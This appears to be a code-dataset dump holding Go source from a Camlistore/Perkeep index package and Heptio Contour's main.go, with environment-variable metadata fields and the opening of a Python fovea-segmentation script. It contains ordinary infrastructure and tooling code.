it := x.queryPrefix(keyRecentPermanode, keyId)
defer closeIterator(it, &err)
for it.Next() {
permaStr := it.Value()
parts := strings.SplitN(it.Key(), "|", 4)
if len(parts) != 4 {
continue
}
mTime, _ := time.Parse(time.RFC3339, unreverseTimeString(parts[2]))
permaRef, ok := blob.Parse(permaStr)
if !ok {
continue
}
if x.IsDeleted(permaRef) {
continue
}
if seenPermanode.Dup(permaStr) {
continue
}
// Skip entries with an mTime less than or equal to before.
if !mTime.Before(before) {
continue
}
dest <- camtypes.RecentPermanode{
Permanode: permaRef,
Signer: owner, // TODO(bradfitz): kinda. usually. for now.
LastModTime: mTime,
}
sent++
if sent == limit {
break
}
}
return nil
}
func (x *Index) AppendClaims(dst []camtypes.Claim, permaNode blob.Ref,
signerFilter blob.Ref,
attrFilter string) ([]camtypes.Claim, error) {
if x.corpus != nil {
return x.corpus.AppendClaims(dst, permaNode, signerFilter, attrFilter)
}
var (
keyId string
err error
it sorted.Iterator
)
if signerFilter.Valid() {
keyId, err = x.KeyId(signerFilter)
if err == sorted.ErrNotFound {
return nil, nil
}
if err != nil {
return nil, err
}
it = x.queryPrefix(keyPermanodeClaim, permaNode, keyId)
} else {
it = x.queryPrefix(keyPermanodeClaim, permaNode)
}
defer closeIterator(it, &err)
// In the common case, an attribute filter is just a plain
// token ("camliContent") unescaped. If so, fast path that
// check to skip the row before we even split it.
var mustHave string
if attrFilter != "" && urle(attrFilter) == attrFilter {
mustHave = attrFilter
}
for it.Next() {
val := it.Value()
if mustHave != "" && !strings.Contains(val, mustHave) {
continue
}
cl, ok := kvClaim(it.Key(), val, blob.Parse)
if !ok {
continue
}
if x.IsDeleted(cl.BlobRef) {
continue
}
if attrFilter != "" && cl.Attr != attrFilter {
continue
}
if signerFilter.Valid() && cl.Signer != signerFilter {
continue
}
dst = append(dst, cl)
}
return dst, nil
}
func kvClaim(k, v string, blobParse func(string) (blob.Ref, bool)) (c camtypes.Claim, ok bool) {
const nKeyPart = 5
const nValPart = 4
var keya [nKeyPart]string
var vala [nValPart]string
keyPart := strutil.AppendSplitN(keya[:0], k, "|", -1)
valPart := strutil.AppendSplitN(vala[:0], v, "|", -1)
if len(keyPart) < nKeyPart || len(valPart) < nValPart {
return
}
signerRef, ok := blobParse(valPart[3])
if !ok {
return
}
permaNode, ok := blobParse(keyPart[1])
if !ok {
return
}
claimRef, ok := blobParse(keyPart[4])
if !ok {
return
}
date, err := time.Parse(time.RFC3339, keyPart[3])
if err != nil {
return
}
return camtypes.Claim{
BlobRef: claimRef,
Signer: signerRef,
Permanode: permaNode,
Date: date,
Type: urld(valPart[0]),
Attr: urld(valPart[1]),
Value: urld(valPart[2]),
}, true
}
func (x *Index) GetBlobMeta(br blob.Ref) (camtypes.BlobMeta, error) {
if x.corpus != nil {
return x.corpus.GetBlobMeta(br)
}
key := "meta:" + br.String()
meta, err := x.s.Get(key)
if err == sorted.ErrNotFound {
err = os.ErrNotExist
}
if err != nil {
return camtypes.BlobMeta{}, err
}
pos := strings.Index(meta, "|")
if pos < 0 {
panic(fmt.Sprintf("Bogus index row for key %q: got value %q", key, meta))
}
size, err := strconv.ParseUint(meta[:pos], 10, 32)
if err != nil {
return camtypes.BlobMeta{}, err
}
mime := meta[pos+1:]
return camtypes.BlobMeta{
Ref: br,
Size: uint32(size),
CamliType: camliTypeFromMIME(mime),
}, nil
}
func (x *Index) KeyId(signer blob.Ref) (string, error) {
if x.corpus != nil {
return x.corpus.KeyId(signer)
}
return x.s.Get("signerkeyid:" + signer.String())
}
func (x *Index) PermanodeOfSignerAttrValue(signer blob.Ref, attr, val string) (permaNode blob.Ref, err error) {
keyId, err := x.KeyId(signer)
if err == sorted.ErrNotFound {
return blob.Ref{}, os.ErrNotExist
}
if err != nil {
return blob.Ref{}, err
}
it := x.queryPrefix(keySignerAttrValue, keyId, attr, val)
defer closeIterator(it, &err)
for it.Next() {
permaRef, ok := blob.Parse(it.Value())
if ok && !x.IsDeleted(permaRef) {
return permaRef, nil
}
}
return blob.Ref{}, os.ErrNotExist
}
// This is just like PermanodeOfSignerAttrValue except we return multiple and dup-suppress.
// If request.Query is "", it is not used in the prefix search.
func (x *Index) SearchPermanodesWithAttr(dest chan<- blob.Ref, request *camtypes.PermanodeByAttrRequest) (err error) {
defer close(dest)
if request.FuzzyMatch {
// TODO(bradfitz): remove this for now? figure out how to handle it generically?
return errors.New("TODO: SearchPermanodesWithAttr: generic indexer doesn't support FuzzyMatch on PermanodeByAttrRequest")
}
if request.Attribute == "" {
return errors.New("index: missing Attribute in SearchPermanodesWithAttr")
}
keyId, err := x.KeyId(request.Signer)
if err == sorted.ErrNotFound {
return nil
}
if err != nil {
return err
}
seen := make(map[string]bool)
var it sorted.Iterator
if request.Query == "" {
it = x.queryPrefix(keySignerAttrValue, keyId, request.Attribute)
} else {
it = x.queryPrefix(keySignerAttrValue, keyId, request.Attribute, request.Query)
}
defer closeIterator(it, &err)
for it.Next() {
cl, ok := kvSignerAttrValue(it.Key(), it.Value())
if !ok {
continue
}
if x.IsDeleted(cl.BlobRef) {
continue
}
if x.IsDeleted(cl.Permanode) {
continue
}
pnstr := cl.Permanode.String()
if seen[pnstr] {
continue
}
seen[pnstr] = true
dest <- cl.Permanode
if len(seen) == request.MaxResults {
break
}
}
return nil
}
func kvSignerAttrValue(k, v string) (c camtypes.Claim, ok bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
valPart := strings.Split(v, "|")
if len(keyPart) != 6 || len(valPart) != 1 {
// TODO(mpl): use glog
log.Printf("bogus keySignerAttrValue index entry: %q = %q", k, v)
return
}
if keyPart[0] != "signerattrvalue" {
return
}
date, err := time.Parse(time.RFC3339, unreverseTimeString(keyPart[4]))
if err != nil {
log.Printf("bogus time in keySignerAttrValue index entry: %q", keyPart[4])
return
}
claimRef, ok := blob.Parse(keyPart[5])
if !ok {
log.Printf("bogus claim in keySignerAttrValue index entry: %q", keyPart[5])
return
}
permaNode, ok := blob.Parse(valPart[0])
if !ok {
log.Printf("bogus permanode in keySignerAttrValue index entry: %q", valPart[0])
return
}
return camtypes.Claim{
BlobRef: claimRef,
Permanode: permaNode,
Date: date,
Attr: urld(keyPart[2]),
Value: urld(keyPart[3]),
}, true
}
func (x *Index) PathsOfSignerTarget(signer, target blob.Ref) (paths []*camtypes.Path, err error) {
paths = []*camtypes.Path{}
keyId, err := x.KeyId(signer)
if err != nil {
if err == sorted.ErrNotFound {
err = nil
}
return
}
mostRecent := make(map[string]*camtypes.Path)
maxClaimDates := make(map[string]time.Time)
it := x.queryPrefix(keyPathBackward, keyId, target)
defer closeIterator(it, &err)
for it.Next() {
p, ok, active := kvPathBackward(it.Key(), it.Value())
if !ok {
continue
}
if x.IsDeleted(p.Claim) {
continue
}
if x.IsDeleted(p.Base) {
continue
}
key := p.Base.String() + "/" + p.Suffix
if p.ClaimDate.After(maxClaimDates[key]) {
maxClaimDates[key] = p.ClaimDate
if active {
mostRecent[key] = &p
} else {
delete(mostRecent, key)
}
}
}
for _, v := range mostRecent {
paths = append(paths, v)
}
return paths, nil
}
func kvPathBackward(k, v string) (p camtypes.Path, ok bool, active bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
valPart := strings.Split(v, "|")
if len(keyPart) != 4 || len(valPart) != 4 {
// TODO(mpl): use glog
log.Printf("bogus keyPathBackward index entry: %q = %q", k, v)
return
}
if keyPart[0] != "signertargetpath" {
return
}
target, ok := blob.Parse(keyPart[2])
if !ok {
log.Printf("bogus target in keyPathBackward index entry: %q", keyPart[2])
return
}
claim, ok := blob.Parse(keyPart[3])
if !ok {
log.Printf("bogus claim in keyPathBackward index entry: %q", keyPart[3])
return
}
date, err := time.Parse(time.RFC3339, valPart[0])
if err != nil {
log.Printf("bogus date in keyPathBackward index entry: %q", valPart[0])
return
}
base, ok := blob.Parse(valPart[1])
if !ok {
log.Printf("bogus base in keyPathBackward index entry: %q", valPart[1])
return
}
if valPart[2] == "Y" {
active = true
}
return camtypes.Path{
Claim: claim,
Base: base,
Target: target,
ClaimDate: date,
Suffix: urld(valPart[3]),
}, true, active
}
func (x *Index) PathsLookup(signer, base blob.Ref, suffix string) (paths []*camtypes.Path, err error) {
paths = []*camtypes.Path{}
keyId, err := x.KeyId(signer)
if err != nil {
if err == sorted.ErrNotFound {
err = nil
}
return
}
it := x.queryPrefix(keyPathForward, keyId, base, suffix)
defer closeIterator(it, &err)
for it.Next() {
p, ok, active := kvPathForward(it.Key(), it.Value())
if !ok {
continue
}
if x.IsDeleted(p.Claim) {
continue
}
if x.IsDeleted(p.Target) {
continue
}
// TODO(bradfitz): investigate what's up with deleted
// forward path claims here. Needs docs with the
// interface too, and tests.
_ = active
paths = append(paths, &p)
}
return
}
func kvPathForward(k, v string) (p camtypes.Path, ok bool, active bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
valPart := strings.Split(v, "|")
if len(keyPart) != 6 || len(valPart) != 2 {
// TODO(mpl): use glog
log.Printf("bogus keyPathForward index entry: %q = %q", k, v)
return
}
if keyPart[0] != "path" {
return
}
base, ok := blob.Parse(keyPart[2])
if !ok {
log.Printf("bogus base in keyPathForward index entry: %q", keyPart[2])
return
}
date, err := time.Parse(time.RFC3339, unreverseTimeString(keyPart[4]))
if err != nil {
log.Printf("bogus date in keyPathForward index entry: %q", keyPart[4])
return
}
claim, ok := blob.Parse(keyPart[5])
if !ok {
log.Printf("bogus claim in keyPathForward index entry: %q", keyPart[5])
return
}
if valPart[0] == "Y" {
active = true
}
target, ok := blob.Parse(valPart[1])
if !ok {
log.Printf("bogus target in keyPathForward index entry: %q", valPart[1])
return
}
return camtypes.Path{
Claim: claim,
Base: base,
Target: target,
ClaimDate: date,
Suffix: urld(keyPart[3]),
}, true, active
}
func (x *Index) PathLookup(signer, base blob.Ref, suffix string, at time.Time) (*camtypes.Path, error) {
paths, err := x.PathsLookup(signer, base, suffix)
if err != nil {
return nil, err
}
var (
newest = int64(0)
atSeconds = int64(0)
best *camtypes.Path
)
if !at.IsZero() {
atSeconds = at.Unix()
}
for _, path := range paths {
t := path.ClaimDate
secs := t.Unix()
if atSeconds != 0 && secs > atSeconds {
// Too new
continue
}
if newest > secs {
// Too old
continue
}
// Just right
newest, best = secs, path
}
if best == nil {
return nil, os.ErrNotExist
}
return best, nil
}
func (x *Index) ExistingFileSchemas(wholeRef blob.Ref) (schemaRefs []blob.Ref, err error) {
it := x.queryPrefix(keyWholeToFileRef, wholeRef)
defer closeIterator(it, &err)
for it.Next() {
keyPart := strings.Split(it.Key(), "|")[1:]
if len(keyPart) < 2 {
continue
}
ref, ok := blob.Parse(keyPart[1])
if ok {
schemaRefs = append(schemaRefs, ref)
}
}
return schemaRefs, nil
}
func (x *Index) loadKey(key string, val *string, err *error, wg *sync.WaitGroup) {
defer wg.Done()
*val, *err = x.s.Get(key)
}
func (x *Index) GetFileInfo(fileRef blob.Ref) (camtypes.FileInfo, error) {
if x.corpus != nil {
return x.corpus.GetFileInfo(fileRef)
}
ikey := "fileinfo|" + fileRef.String()
tkey := "filetimes|" + fileRef.String()
// TODO: switch this to use syncutil.Group
wg := new(sync.WaitGroup)
wg.Add(2)
var iv, tv string // info value, time value
var ierr, terr error
go x.loadKey(ikey, &iv, &ierr, wg)
go x.loadKey(tkey, &tv, &terr, wg)
wg.Wait()
if ierr == sorted.ErrNotFound {
return camtypes.FileInfo{}, os.ErrNotExist
}
if ierr != nil {
return camtypes.FileInfo{}, ierr
}
valPart := strings.Split(iv, "|")
if len(valPart) < 3 {
log.Printf("index: bogus key %q = %q", ikey, iv)
return camtypes.FileInfo{}, os.ErrNotExist
}
var wholeRef blob.Ref
if len(valPart) >= 4 {
wholeRef, _ = blob.Parse(valPart[3])
}
size, err := strconv.ParseInt(valPart[0], 10, 64)
if err != nil {
log.Printf("index: bogus integer at position 0 in key %q = %q", ikey, iv)
return camtypes.FileInfo{}, os.ErrNotExist
}
fileName := urld(valPart[1])
fi := camtypes.FileInfo{
Size: size,
FileName: fileName,
MIMEType: urld(valPart[2]),
WholeRef: wholeRef,
}
if tv != "" {
times := strings.Split(urld(tv), ",")
updateFileInfoTimes(&fi, times)
}
return fi, nil
}
func updateFileInfoTimes(fi *camtypes.FileInfo, times []string) {
if len(times) == 0 {
return
}
fi.Time = types.ParseTime3339OrNil(times[0])
if len(times) == 2 {
fi.ModTime = types.ParseTime3339OrNil(times[1])
}
}
// v is "width|height"
func kvImageInfo(v []byte) (ii camtypes.ImageInfo, ok bool) {
pipei := bytes.IndexByte(v, '|')
if pipei < 0 {
return
}
w, err := strutil.ParseUintBytes(v[:pipei], 10, 16)
if err != nil {
return
}
h, err := strutil.ParseUintBytes(v[pipei+1:], 10, 16)
if err != nil {
return
}
ii.Width = uint16(w)
ii.Height = uint16(h)
return ii, true
}
func (x *Index) GetImageInfo(fileRef blob.Ref) (camtypes.ImageInfo, error) {
if x.corpus != nil {
return x.corpus.GetImageInfo(fileRef)
}
// it might be that the key does not exist because image.DecodeConfig failed earlier
// (because of unsupported JPEG features like progressive mode).
key := keyImageSize.Key(fileRef.String())
v, err := x.s.Get(key)
if err == sorted.ErrNotFound {
err = os.ErrNotExist
}
if err != nil {
return camtypes.ImageInfo{}, err
}
ii, ok := kvImageInfo([]byte(v))
if !ok {
return camtypes.ImageInfo{}, fmt.Errorf("index: bogus key %q = %q", key, v)
}
return ii, nil
}
func (x *Index) GetMediaTags(fileRef blob.Ref) (tags map[string]string, err error) {
if x.corpus != nil {
return x.corpus.GetMediaTags(fileRef)
}
it := x.queryPrefix(keyMediaTag, fileRef.String())
defer closeIterator(it, &err)
for it.Next() {
tags[it.Key()] = it.Value()
}
return tags, nil
}
func (x *Index) EdgesTo(ref blob.Ref, opts *camtypes.EdgesToOpts) (edges []*camtypes.Edge, err error) {
it := x.queryPrefix(keyEdgeBackward, ref)
defer closeIterator(it, &err)
permanodeParents := make(map[string]*camtypes.Edge)
for it.Next() {
edge, ok := kvEdgeBackward(it.Key(), it.Value())
if !ok {
continue
}
if x.IsDeleted(edge.From) {
continue
}
if x.IsDeleted(edge.BlobRef) {
continue
}
edge.To = ref
if edge.FromType == "permanode" {
permanodeParents[edge.From.String()] = edge
} else {
edges = append(edges, edge)
}
}
for _, e := range permanodeParents {
edges = append(edges, e)
}
return edges, nil
}
func kvEdgeBackward(k, v string) (edge *camtypes.Edge, ok bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
valPart := strings.Split(v, "|")
if len(keyPart) != 4 || len(valPart) != 2 {
// TODO(mpl): use glog
log.Printf("bogus keyEdgeBackward index entry: %q = %q", k, v)
return
}
if keyPart[0] != "edgeback" {
return
}
parentRef, ok := blob.Parse(keyPart[2])
if !ok {
log.Printf("bogus parent in keyEdgeBackward index entry: %q", keyPart[2])
return
}
blobRef, ok := blob.Parse(keyPart[3])
if !ok {
log.Printf("bogus blobref in keyEdgeBackward index entry: %q", keyPart[3])
return
}
return &camtypes.Edge{
From: parentRef,
FromType: valPart[0],
FromTitle: valPart[1],
BlobRef: blobRef,
}, true
}
// GetDirMembers sends on dest the children of the static directory dir.
func (x *Index) GetDirMembers(dir blob.Ref, dest chan<- blob.Ref, limit int) (err error) {
defer close(dest)
sent := 0
it := x.queryPrefix(keyStaticDirChild, dir.String())
defer closeIterator(it, &err)
for it.Next() {
keyPart := strings.Split(it.Key(), "|")
if len(keyPart) != 3 {
return fmt.Errorf("index: bogus key keyStaticDirChild = %q", it.Key())
}
child, ok := blob.Parse(keyPart[2])
if !ok {
continue
}
dest <- child
sent++
if sent == limit {
break
}
}
return nil
}
func kvBlobMeta(k, v string) (bm camtypes.BlobMeta, ok bool) {
refStr := k[len("meta:"):]
br, ok := blob.Parse(refStr)
if !ok {
return
}
pipe := strings.Index(v, "|")
if pipe < 0 {
return
}
size, err := strconv.ParseUint(v[:pipe], 10, 32)
if err != nil {
return
}
return camtypes.BlobMeta{
Ref: br,
Size: uint32(size),
CamliType: camliTypeFromMIME(v[pipe+1:]),
}, true
}
func kvBlobMeta_bytes(k, v []byte) (bm camtypes.BlobMeta, ok bool) {
ref := k[len("meta:"):]
br, ok := blob.ParseBytes(ref)
if !ok {
return
}
pipe := bytes.IndexByte(v, '|')
if pipe < 0 {
return
}
size, err := strutil.ParseUintBytes(v[:pipe], 10, 32)
if err != nil {
return
}
return camtypes.BlobMeta{
Ref: br,
Size: uint32(size),
CamliType: camliTypeFromMIME_bytes(v[pipe+1:]),
}, true
}
func enumerateBlobMeta(s sorted.KeyValue, cb func(camtypes.BlobMeta) error) (err error) {
it := queryPrefixString(s, "meta:")
defer closeIterator(it, &err)
for it.Next() {
bm, ok := kvBlobMeta(it.Key(), it.Value())
if !ok {
continue
}
if err := cb(bm); err != nil {
return err
}
}
return nil
}
func enumerateSignerKeyId(s sorted.KeyValue, cb func(blob.Ref, string)) (err error) {
const pfx = "signerkeyid:"
it := queryPrefixString(s, pfx)
defer closeIterator(it, &err)
for it.Next() {
if br, ok := blob.Parse(strings.TrimPrefix(it.Key(), pfx)); ok {
cb(br, it.Value())
}
}
return
}
// EnumerateBlobMeta sends all metadata about all known blobs to ch and then closes ch.
func (x *Index) EnumerateBlobMeta(ctx *context.Context, ch chan<- camtypes.BlobMeta) (err error) {
if x.corpus != nil {
x.corpus.RLock()
defer x.corpus.RUnlock()
return x.corpus.EnumerateBlobMetaLocked(ctx, ch)
}
defer close(ch)
return enumerateBlobMeta(x.s, func(bm camtypes.BlobMeta) error {
select {
case ch <- bm:
case <-ctx.Done():
return context.ErrCanceled
}
return nil
})
}
// Storage returns the index's underlying Storage implementation.
func (x *Index) Storage() sorted.KeyValue { return x.s }
// Close closes the underlying sorted.KeyValue, if the storage has a Close method.
// The return value is the return value of the underlying Close, or
// nil otherwise.
func (x *Index) Close() error {
if cl, ok := x.s.(io.Closer); ok {
return cl.Close()
}
close(x.tickleOoo)
return nil
}
// initNeededMaps initializes x.needs and x.neededBy on start-up.
func (x *Index) initNeededMaps() (err error) {
x.deletes = newDeletionCache()
it := x.queryPrefix(keyMissing)
defer closeIterator(it, &err)
for it.Next() {
key := it.KeyBytes()
pair := key[len("missing|"):]
pipe := bytes.IndexByte(pair, '|')
if pipe < 0 {
return fmt.Errorf("Bogus missing key %q", key)
}
have, ok1 := blob.ParseBytes(pair[:pipe])
missing, ok2 := blob.ParseBytes(pair[pipe+1:])
if !ok1 || !ok2 {
return fmt.Errorf("Bogus missing key %q", key)
}
x.noteNeededMemory(have, missing)
}
return
}
func (x *Index) noteNeeded(have, missing blob.Ref) error {
if err := x.s.Set(keyMissing.Key(have, missing), "1"); err != nil {
return err
}
x.noteNeededMemory(have, missing)
return nil
}
func (x *Index) noteNeededMemory(have, missing blob.Ref) {
x.mu.Lock()
x.needs[have] = append(x.needs[have], missing)
x.neededBy[missing] = append(x.neededBy[missing], have)
x.mu.Unlock()
}
const camliTypeMIMEPrefix = "application/json; camliType="
var camliTypeMIMEPrefixBytes = []byte(camliTypeMIMEPrefix)
// "application/json; camliType=file" => "file"
// "image/gif" => ""
func camliTypeFromMIME(mime string) string {
if v := strings.TrimPrefix(mime, camliTypeMIMEPrefix); v != mime {
return v
}
return ""
}
func camliTypeFromMIME_bytes(mime []byte) string {
if v := bytes.TrimPrefix(mime, camliTypeMIMEPrefixBytes); len(v) != len(mime) {
return strutil.StringFromBytes(v)
}
return ""
}
// TODO(bradfitz): rename this? This is really about signer-attr-value
// (PermanodeOfSignerAttrValue), and not about indexed attributes in general.
func IsIndexedAttribute(attr string) bool {
switch attr {
case "camliRoot", "camliImportRoot", "tag", "title":
return true
}
return false
}
// IsBlobReferenceAttribute returns whether attr is an attribute whose
// value is a blob reference (e.g. camliMember) and thus something the
// indexers should keep inverted indexes on for parent/child-type
// relationships.
func IsBlobReferenceAttribute(attr string) bool {
switch attr {
case "camliMember":
return true
}
return false
}
func IsFulltextAttribute(attr string) bool {
switch attr {
case "tag", "title":
return true
}
return false
}
|
[
"\"CAMLI_TESTREINDEX_DISABLE_OOO\"",
"\"CAMLI_REINDEX_START\""
] |
[] |
[
"CAMLI_TESTREINDEX_DISABLE_OOO",
"CAMLI_REINDEX_START"
] |
[]
|
["CAMLI_TESTREINDEX_DISABLE_OOO", "CAMLI_REINDEX_START"]
|
go
| 2 | 0 | |
cmd/contour/contour.go
|
// Copyright © 2017 Heptio
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"flag"
"fmt"
"net"
"os"
"path/filepath"
"strconv"
"strings"
clientset "github.com/heptio/contour/apis/generated/clientset/versioned"
"github.com/heptio/contour/internal/contour"
"github.com/heptio/contour/internal/debug"
"github.com/heptio/contour/internal/envoy"
"github.com/heptio/contour/internal/grpc"
"github.com/heptio/contour/internal/httpsvc"
"github.com/heptio/contour/internal/k8s"
"github.com/heptio/contour/internal/metrics"
"github.com/heptio/workgroup"
"github.com/prometheus/client_golang/prometheus"
"github.com/sirupsen/logrus"
kingpin "gopkg.in/alecthomas/kingpin.v2"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
)
var ingressrouteRootNamespaceFlag string
func main() {
log := logrus.StandardLogger()
app := kingpin.New("contour", "Heptio Contour Kubernetes ingress controller.")
var config envoy.BootstrapConfig
bootstrap := app.Command("bootstrap", "Generate bootstrap configuration.")
path := bootstrap.Arg("path", "Configuration file.").Required().String()
bootstrap.Flag("admin-address", "Envoy admin interface address").StringVar(&config.AdminAddress)
bootstrap.Flag("admin-port", "Envoy admin interface port").IntVar(&config.AdminPort)
bootstrap.Flag("stats-address", "Envoy /stats interface address").StringVar(&config.StatsAddress)
bootstrap.Flag("stats-port", "Envoy /stats interface port").IntVar(&config.StatsPort)
bootstrap.Flag("xds-address", "xDS gRPC API address").StringVar(&config.XDSAddress)
bootstrap.Flag("xds-port", "xDS gRPC API port").IntVar(&config.XDSGRPCPort)
bootstrap.Flag("statsd-enabled", "enable statsd output").BoolVar(&config.StatsdEnabled)
bootstrap.Flag("statsd-address", "statsd address").StringVar(&config.StatsdAddress)
bootstrap.Flag("statsd-port", "statsd port").IntVar(&config.StatsdPort)
cli := app.Command("cli", "A CLI client for the Heptio Contour Kubernetes ingress controller.")
var client Client
cli.Flag("contour", "contour host:port.").Default("127.0.0.1:8001").StringVar(&client.ContourAddr)
var resources []string
cds := cli.Command("cds", "watch services.")
cds.Arg("resources", "CDS resource filter").StringsVar(&resources)
eds := cli.Command("eds", "watch endpoints.")
eds.Arg("resources", "EDS resource filter").StringsVar(&resources)
lds := cli.Command("lds", "watch listerners.")
lds.Arg("resources", "LDS resource filter").StringsVar(&resources)
rds := cli.Command("rds", "watch routes.")
rds.Arg("resources", "RDS resource filter").StringsVar(&resources)
serve := app.Command("serve", "Serve xDS API traffic")
inCluster := serve.Flag("incluster", "use in cluster configuration.").Bool()
kubeconfig := serve.Flag("kubeconfig", "path to kubeconfig (if not in running inside a cluster)").Default(filepath.Join(os.Getenv("HOME"), ".kube", "config")).String()
xdsAddr := serve.Flag("xds-address", "xDS gRPC API address").Default("127.0.0.1").String()
xdsPort := serve.Flag("xds-port", "xDS gRPC API port").Default("8001").Int()
ch := contour.CacheHandler{
FieldLogger: log.WithField("context", "CacheHandler"),
}
metricsvc := metrics.Service{
Service: httpsvc.Service{
FieldLogger: log.WithField("context", "metricsvc"),
},
}
registry := prometheus.NewRegistry()
metricsvc.Registry = registry
// register detault process / go collectors
registry.MustRegister(prometheus.NewProcessCollector(prometheus.ProcessCollectorOpts{}))
registry.MustRegister(prometheus.NewGoCollector())
// register our custom metrics
metrics := metrics.NewMetrics(registry)
reh := contour.ResourceEventHandler{
FieldLogger: log.WithField("context", "resourceEventHandler"),
Notifier: &contour.HoldoffNotifier{
Notifier: &ch,
FieldLogger: log.WithField("context", "HoldoffNotifier"),
Metrics: metrics,
},
}
// configuration parameters for debug service
debugsvc := debug.Service{
Service: httpsvc.Service{
FieldLogger: log.WithField("context", "debugsvc"),
},
// plumb the DAGAdapter's Builder through
// to the debug handler
Builder: &reh.Builder,
}
serve.Flag("debug-http-address", "address the debug http endpoint will bind too").Default("127.0.0.1").StringVar(&debugsvc.Addr)
serve.Flag("debug-http-port", "port the debug http endpoint will bind too").Default("6060").IntVar(&debugsvc.Port)
serve.Flag("http-address", "address the metrics http endpoint will bind too").Default("0.0.0.0").StringVar(&metricsvc.Addr)
serve.Flag("http-port", "port the metrics http endpoint will bind too").Default("8000").IntVar(&metricsvc.Port)
serve.Flag("envoy-http-access-log", "Envoy HTTP access log").Default(contour.DEFAULT_HTTP_ACCESS_LOG).StringVar(&ch.HTTPAccessLog)
serve.Flag("envoy-https-access-log", "Envoy HTTPS access log").Default(contour.DEFAULT_HTTPS_ACCESS_LOG).StringVar(&ch.HTTPSAccessLog)
serve.Flag("envoy-external-http-port", "External port for HTTP requests").Default("80").IntVar(&reh.ExternalInsecurePort)
serve.Flag("envoy-external-https-port", "External port for HTTPS requests").Default("443").IntVar(&reh.ExternalSecurePort)
serve.Flag("envoy-service-http-address", "Kubernetes Service address for HTTP requests").Default("0.0.0.0").StringVar(&ch.HTTPAddress)
serve.Flag("envoy-service-https-address", "Kubernetes Service address for HTTPS requests").Default("0.0.0.0").StringVar(&ch.HTTPSAddress)
serve.Flag("envoy-service-http-port", "Kubernetes Service port for HTTP requests").Default("8080").IntVar(&ch.HTTPPort)
serve.Flag("envoy-service-https-port", "Kubernetes Service port for HTTPS requests").Default("8443").IntVar(&ch.HTTPSPort)
serve.Flag("use-proxy-protocol", "Use PROXY protocol for all listeners").BoolVar(&ch.UseProxyProto)
serve.Flag("ingress-class-name", "Contour IngressClass name").StringVar(&reh.IngressClass)
serve.Flag("ingressroute-root-namespaces", "Restrict contour to searching these namespaces for root ingress routes").StringVar(&ingressrouteRootNamespaceFlag)
args := os.Args[1:]
switch kingpin.MustParse(app.Parse(args)) {
case bootstrap.FullCommand():
writeBootstrapConfig(&config, *path)
case cds.FullCommand():
stream := client.ClusterStream()
watchstream(stream, clusterType, resources)
case eds.FullCommand():
stream := client.EndpointStream()
watchstream(stream, endpointType, resources)
case lds.FullCommand():
stream := client.ListenerStream()
watchstream(stream, listenerType, resources)
case rds.FullCommand():
stream := client.RouteStream()
watchstream(stream, routeType, resources)
case serve.FullCommand():
log.Infof("args: %v", args)
var g workgroup.Group
// client-go uses glog which requires initialisation as a side effect of calling
// flag.Parse (see #118 and https://github.com/golang/glog/blob/master/glog.go#L679)
// However kingpin owns our flag parsing, so we defer calling flag.Parse until
// this point to avoid the Go flag package from rejecting flags which are defined
// in kingpin. See #371
flag.Parse()
reh.IngressRouteRootNamespaces = parseRootNamespaces(ingressrouteRootNamespaceFlag)
client, contourClient := newClient(*kubeconfig, *inCluster)
wl := log.WithField("context", "watch")
k8s.WatchServices(&g, client, wl, &reh)
k8s.WatchIngress(&g, client, wl, &reh)
k8s.WatchSecrets(&g, client, wl, &reh)
k8s.WatchIngressRoutes(&g, contourClient, wl, &reh)
ch.IngressRouteStatus = &k8s.IngressRouteStatus{
Client: contourClient,
}
// Endpoints updates are handled directly by the EndpointsTranslator
// due to their high update rate and their orthogonal nature.
et := &contour.EndpointsTranslator{
FieldLogger: log.WithField("context", "endpointstranslator"),
}
k8s.WatchEndpoints(&g, client, wl, et)
ch.Metrics = metrics
reh.Metrics = metrics
g.Add(debugsvc.Start)
g.Add(metricsvc.Start)
g.Add(func(stop <-chan struct{}) error {
log := log.WithField("context", "grpc")
addr := net.JoinHostPort(*xdsAddr, strconv.Itoa(*xdsPort))
l, err := net.Listen("tcp", addr)
if err != nil {
return err
}
// Resource types in xDS v2.
const (
googleApis = "type.googleapis.com/"
typePrefix = googleApis + "envoy.api.v2."
endpointType = typePrefix + "ClusterLoadAssignment"
clusterType = typePrefix + "Cluster"
routeType = typePrefix + "RouteConfiguration"
listenerType = typePrefix + "Listener"
)
s := grpc.NewAPI(log, map[string]grpc.Cache{
clusterType: &ch.ClusterCache,
routeType: &ch.RouteCache,
listenerType: &ch.ListenerCache,
endpointType: et,
})
log.Println("started")
defer log.Println("stopped")
return s.Serve(l)
})
g.Run()
default:
app.Usage(args)
os.Exit(2)
}
}
func newClient(kubeconfig string, inCluster bool) (*kubernetes.Clientset, *clientset.Clientset) {
var err error
var config *rest.Config
if kubeconfig != "" && !inCluster {
config, err = clientcmd.BuildConfigFromFlags("", kubeconfig)
check(err)
} else {
config, err = rest.InClusterConfig()
check(err)
}
client, err := kubernetes.NewForConfig(config)
check(err)
contourClient, err := clientset.NewForConfig(config)
check(err)
return client, contourClient
}
func check(err error) {
if err != nil {
fmt.Fprintln(os.Stderr, err)
os.Exit(1)
}
}
func parseRootNamespaces(rn string) []string {
if rn == "" {
return nil
}
var ns []string
for _, s := range strings.Split(rn, ",") {
ns = append(ns, strings.TrimSpace(s))
}
return ns
}
|
[
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
predict_Fovea_seg_stage1.py
|
import os
import numpy as np
import torch
import math
import segmentation_models_pytorch as smp
import pickle
import cv2
import argparse
from utils import remove_small_areas, keep_large_area
from skimage import exposure, io
import torch.nn as nn
from skimage.measure import *
import pandas as pd
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=int, default=0, help='which gpu is used')
args = parser.parse_args()
